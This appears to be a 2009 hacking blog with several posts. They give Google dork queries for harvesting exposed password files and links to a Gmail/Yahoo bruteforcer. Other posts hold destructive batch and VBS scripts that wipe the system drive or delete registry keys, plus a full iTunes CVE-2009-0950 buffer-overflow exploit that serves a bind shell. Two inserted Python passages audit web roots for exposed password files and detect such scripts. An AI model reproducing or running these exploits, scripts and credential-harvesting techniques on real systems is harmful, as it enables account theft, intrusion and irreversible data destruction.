Monday, August 3, 2009

Hacking usernames and password with Google

In this guide I will try my best to teach you how to use google to get your usernames and passwords for random sites....
It's pretty simple and all you need is a brain

--------------------
Tutorial By Casi
@ CyberXtreme.info
--------------------

So let's get started...

Start up your favorite internet browser; I am using Firefox

Then go to
Code:
www.google.com

And type in the below code

Code:
filetype:log inurl:*password.log"

This will find all websites that stored a "password.log" on their servers, and you will be able to see the login and password for different users to different sites.
Now Google is being a bit of a smartass, and you won't get the results on the 1st page, at least I did not, so bump out to 3+ pages and they started showing up for me

Below is an example of what I got

Code:
name: = "procesos"; password: = "procesos"; URL: = "http://ayura.udea.edu.co/

Here comes a 2nd way to do it, better and more effective in my opinion...

Once again, go to google

Type in the code below


Code:
ext:pwd inurl:(service authors administrators users) *#-FrontPage-*

Hit Search and.. you'll get it by there..
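Both queries above only return files that a web server is already serving to crawlers, so the same patterns can be checked from the inside before a search engine finds them. The following is an added example, not part of the original tutorial: a Python audit of a document root for the file names and header those queries match. The `_vti_pvt` directory name and every file body in `demo()` are constructed sample data.

```python
import os
import tempfile

# Names and header taken from the two queries quoted above.
FRONTPAGE_STEMS = {"service", "authors", "administrators", "users"}
FRONTPAGE_MARKER = b"#-FrontPage-"

def classify(path):
    """Return a reason string if the file matches either query, else None."""
    name = os.path.basename(path).lower()
    if name.endswith("password.log"):
        return "credential log (filetype:log inurl:password.log)"
    stem, ext = os.path.splitext(name)
    if ext == ".pwd":
        if stem in FRONTPAGE_STEMS:
            return "FrontPage password file (known name)"
        with open(path, "rb") as fh:
            # Compare with spaces removed so "# -FrontPage-" also matches.
            if fh.read(64).replace(b" ", b"").startswith(FRONTPAGE_MARKER):
                return "FrontPage password file (header match)"
    return None

def audit_webroot(webroot):
    """Walk the document root and list every file a crawler could index."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        for fname in files:
            full = os.path.join(dirpath, fname)
            reason = classify(full)
            if reason:
                rel = os.path.relpath(full, webroot).replace(os.sep, "/")
                findings.append((rel, reason))
    return sorted(findings)

def demo():
    samples = {  # constructed sample tree, not real data
        "_vti_pvt/service.pwd": b"# -FrontPage-\nexample:PLACEHOLDERHASH\n",
        "_vti_pvt/backup.pwd": b"# -FrontPage-\nexample:PLACEHOLDERHASH\n",
        "logs/password.log": b"constructed sample line\n",
        "index.html": b"<html></html>\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, data in samples.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
        return audit_webroot(root)

if __name__ == "__main__":
    print(demo())
```

Anything the audit reports belongs outside the document root, or behind a deny rule, before the next crawl.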

Thursday, July 30, 2009

Gmail and Yahoo Bruteforcer


This is probably one of the best things. A cracker for both Gmail & Yahoo.

If it doesn't work, extract the .exe file on your desktop, right click on it, and press run as administrator.
Download

Code:
http://rapidshare.com/files/199124494/MailBruteforcer.rar



1gig wordlist compressed to a 5mb archive

http://digg.com/security/1GB_Wordlis..._a_5Mb_Archive



EDIT-------------
RUN THROUGH SANDBOX, HAVEN'T BEEN TESTED

Download: http://www.megaupload.com/?d=3YQT6SRB
Mirror2: http://www.filefactory.com/file/afh8...Bec0de_com_rar
Mirror3: http://www.sendspace.com/file/0ik9fx

Monday, July 27, 2009

Security Webs & Blogs & Podcasts

Webs


Spain
www.dgonzalez.net Diego González Gómez
www.javierpages.com (Blog: www.inforenses.com) Javier Pagès
www.ausejo.net Rafael Ausejo Prieto
www.seguridaddelainformacion.com Vicente Aceituno
Apuntes de seguridad de la información (Blog) Javier Cao Avellaneda
Jessland Jess Garcia
Hispasec Blog (Hispasec)


Worldwide Blogs

Worldwide


www.chuvakin.org (www.info-secure.org) Anton Chuvakin - Security Warrior

www.counterhack.net Ed Skoudis - (Counter)hacking, Malware, Security Challenges

Joshwr1ght Joshua Wright - Wireless Security

www.zeltser.com (Information Security Search engine) Lenny Zeltser - GSE

www.hexblog.com Ilfak Guilfanov - IDA Pro

www.schneier.com (Blog: www.schneier.com/blog/) Bruce Schneier

www.sysinternals.com (Blog: www.sysinternals.com/blog/) Mark Russinovich - Windows Internals

grc.com (Discussions) Steve Gibson (GRC) - Windows

www.petefinnigan.com (Blog: Oracle Security and Forums) Pete Finnigan - Oracle Security

www.trouble.org (www.fish2.com) Dan Farmer - Forensics

www.porcupine.org Wietse Venema - Forensics

www.digital-evidence.org (Sleuthkit) Brian Carrier - Forensics

johnny.ihackstuff.com Johnny Long - Google Hacking (GHDB)

honeyblog.org (Blog) Thorsten Holz

www.wormblog.com (Blog) Jose Nazario

PaulDotCom's Web Site (Blog) Paul Asadoorian

Hack a day Hack a day (beta) Blog

isc.sans.org Handler's Diary - ISC

The Black Page Blackhat: highlights breaking security research


Security Podcasts


Security (... professionals)

Cyberspeak Computer Forensics, Network Security and Computer Crime Podcast

Security Now! Audio security column & podcast by Steve Gibson (GRC) and Leo Laporte

PaulDotCom's Podcast Paul Asadoorian security podcasts (podcasts roundup)

SABAG security Two guys from McAfee, a bit of security and some toast... (CISSP CPEs)

McKeay RSS Martin McKeay's Network Security Podcast

Blue Box The VoIP Security Podcast

Crypto-Gram security podcast RSS Audio of Bruce Schneier's Crypto-Gram Newsletter

The Security Catalyst For anyone interested in security - home users to professionals (CISSP)


Security (... hacking)

Sploitcast The podcast for hackers, geeks, and the security paranoid

BinRev Binary Revolution radio: The Revolution will be Digitized!

Hackermedia Hackermedia is on the air

LiveAmmo Radio

Ninja Night School

The Packet Sniffers Video shows

The hackers voice UK (Continuous radio - NO podcast)

T.W.A.T radio

Hack5 videos VIDEOS


Security News & Managerial

SearchSecurity.com's Security Wire Weekly

Gartner Voice Podcasts for business and IT professionals

CSOonline CSO's executive podcast

CIO Security CIO's security podcast


IT
Geek Muse IT OS geeks Podcast (& Blog) - referenced by Labrat-
In the trenches The podcast for Sys Admins (Kevin Devin)
Friends in tech




--------------------------------------------------------------------------------

Sunday, July 26, 2009

The 8 deadly windows .vbs commands

Note:- The Following tutorial is for educational purpose only. If you harm your or your friend’s computer using the following tutorial

I am going to provide some of my favorite .vbs codes, which I used to play with in my childhood days. You can use these codes as a small term virus. Hence, you can also call this tutorial a virus creation tutorial.

To use the codes I am going to provide, all you need to do is to copy the codes from iTechnoBuzz, paste it in any notepad or text file, then save the text file with anynam.vbs, and yeah don't forget to change the format from text file to all files.
*NOTE* These codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANENTLY deletes files on the computer that cannot be recovered. This will DESTROY the computer.

-The blue screen of Death [this might be dangerous]

Code:-

Code:

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

-Stupidity Shutdown

*This pops up a funny message then will shutdown the computer*

code:-

Code:

@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10

-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]

*This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*

Code:-

Code:

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE

-Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes*

Code:-

Code:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

-Crazy caps lock

*This constantly turns caps lock on and off really fast continuously*

Code:-

Code:

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

-Endless Enter

*This constantly makes it so the enter button is being pressed continuously*

Code:-

Code:

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

-Endless Backspace

*This makes it so the backspace key is constantly being pressed*

Code:-

Code:

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

-Popping CD Drives

*This will make the CD drives constantly pop out*

Code:-

Code:

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
__________________
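The scripts above share a small set of recognisable traits: a recursive delete of %systemdrive%, `reg delete` against HKCR, a forced shutdown, and SendKeys, START or Eject calls inside a loop with no exit. As an added example (not from the original post), this Python triage function flags those traits in a .bat or .vbs body; the rule names, severity labels and the `benign.bat` sample are this example's own assumptions.

```python
import re

# (rule name, severity, pattern, fires only inside an unbounded loop)
# Names and severities are this example's own labels, not a standard.
RULES = [
    ("mass-delete-system-drive", "destructive", r"\bdel\b[^\n]*%systemdrive%[^\n]*/s\b", False),
    ("registry-class-delete", "destructive", r"\breg\s+delete\s+HKCR\b", False),
    ("forced-shutdown", "disruptive", r"\bshutdown\b[^\n]*[-/][sr]\b", False),
    ("sendkeys-in-loop", "disruptive", r"\.sendkeys\b", True),
    ("spawn-in-loop", "disruptive", r"^\s*start\s+\S", True),
    ("eject-in-loop", "disruptive", r"\.eject\b", True),
]
RANK = {"clean": 0, "disruptive": 1, "destructive": 2}

def has_unbounded_loop(text):
    """Batch: GOTO back to an earlier label. VBScript: a bare do ... loop."""
    labels, in_do = set(), False
    for raw in text.splitlines():
        line = raw.strip().lower()
        if line.startswith(":"):
            labels.add(line[1:].strip())
        elif line.startswith("goto ") and line[5:].strip().lstrip(":") in labels:
            return True
        elif line == "do":
            in_do = True
        elif line == "loop" and in_do:
            return True
    return False

def triage(text):
    """Return (verdict, sorted rule names) for one .bat/.vbs script body."""
    looping = has_unbounded_loop(text)
    hits = [(name, sev) for name, sev, rx, loop_only in RULES
            if re.search(rx, text, re.I | re.M) and (looping or not loop_only)]
    verdict = max((sev for _, sev in hits), key=RANK.get, default="clean")
    return verdict, sorted(name for name, _ in hits)

# Constructed samples: the first three reuse lines quoted on this page.
SAMPLES = {
    "wipe.bat": "@echo off\ndel %systemdrive%\\*.* /f /s /q\nshutdown -r -f -t 00\n",
    "notepads.bat": "@ECHO off\n:top\nSTART %SystemRoot%\\system32\\notepad.exe\nGOTO top\n",
    "caps.vbs": "do\nwscript.sleep 100\nwshshell.sendkeys \u201c{CAPSLOCK}\u201d\nloop\n",
    "benign.bat": "@echo off\nstart notepad.exe readme.txt\n",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, triage(body))
```

The loop check is what keeps an ordinary `start` line in a benign batch file from being flagged.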

[0]day itunes exploit

#!/usr/bin/python
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
# www.offensive-security.com/blog/vulndev/itunes-exploitation-case-study/
# Matteo Memelli | ryujin __A-T__ offensive-security.com
# Spaghetti & Pwnsauce - 06/10/2009
# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03
#
# Vulnerability can't be exploited simply overwriting a return address on the
# stack because of stack canary protection. Increasing buffer size leads to
# SEH overwrite but it seems that the Access Violation needed to get our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URI to iTunes:
# - the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)
# - the 2nd payload fully overwrite SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the vulnerability from Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes 8.1.1.10, 8.1.0.52
#
# --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why
#
# ryujin:Desktop ryujin$ ./ipwn.py
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] www.offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from: 172.16.30.7
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444
# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Mozilla Firefox>

from socket import *

html = """

iTunes loading . . .




iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950


ryujin __ A-T __ offensive-security.com


www.offensive-security.com



iTunes starting... wait for 20 secs; if you get an error, click "Ok"
in the MessageBox before checking for your shell on port 4444 :)

If victim host is not connected to the internet, exploit will fail
unless iTunes is already opened and you disable "openiTunes" javascript
function.



This exploit works if opened from Firefox not from IE!



After exploitation iTunes crashes, you need to kill it from TaskManager

have fun!




"""

# Alpha2 ASCII printable Shellcode 730 Bytes, via EDX (0x60,0x40 Badchar)
# This is not standard Alpha2 bind shell. Beginning of shellcode is modified
# in order to obtain register alignment and to reset ESP and EBP we mangled
# before. Rest of decoded shellcode is Metasploit bind shell on port 4444
# EXITFUNC=thread
#
shellcode = ""  # encoded payload omitted
# Padding
pad0x1 = "\x41"*425

# Make EDX pointing to shellcode and "pray" sh3llcod3 M@cumBa w00t w00t
align = "\x61"*45 + "\x54\x5A" + "\x42"*6 + "V"*10

# Padding
pad0x2 = "\x41"*570

# ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet
# 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass)
ret = "\x2a\x5e\x21\x67"

# Let the dance begin... Point EBP to encoded jmp
align_for_jmp = "\x61\x45\x45\x45" + ret + "\x44" + "\x45"*7

# Decode a NEAR JMP and JUMP BACK BABY!
jmp_back = ("UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"
"AQ2AB2BB0BBABXP8ABuJIZIE5jZKOKOA")
# Padding
pad0x3 = "\x43"*162

# We send 2 payloads to iTunes: first is itms and second itpc
# url1 smashes the stack in order to get an AV later
url1 = "itms://:" + "\x41"*200 + "/"
url2 = "itpc://:" + pad0x1 + align + shellcode +pad0x2 +\
align_for_jmp + jmp_back + pad0x3
payload = html % (url1, url2)

print "[+] iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950"
print "[+] Matteo Memelli aka ryujin __A-T__ offensive-security.com"
print "[+] www.offensive-security.com"
print "[+] Spaghetti & Pwnsauce"
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(payload)
print "[+] Payload sent, wait 20 secs for iTunes error!"
c.close()
s.close()

Anonymous Surfing Tool 2009

01 #1 Anonymous Proxy List Verifier 1.1
02 Anonimity 4 Proxy2.8
03 Charon 0.6
04 Get Anonymous 2.1
05 GhostSurf Platinum
06 Hide ip Platinum 3.42
07 Hide The Ip 2.1.1
08 Invisible Browsing 5
09 IP Switcher Professional 1.01.12.0
10 MultiProxy v1.2
11 NetConceal Anonymity Shield 5.2.059.02
12 Proxy Switcher Standard 3.7.2.3913
13 Proxygrab 0.6
14 proxyway extra v3.2
15 SmartProxyHelper 1.5
16 Steganos Internet Anonym v8.0.1
etc.

Code:
http://uploading.com/files/BHFKMOMA/IP_Anonymous_Surfing_Tool_2009.rar.html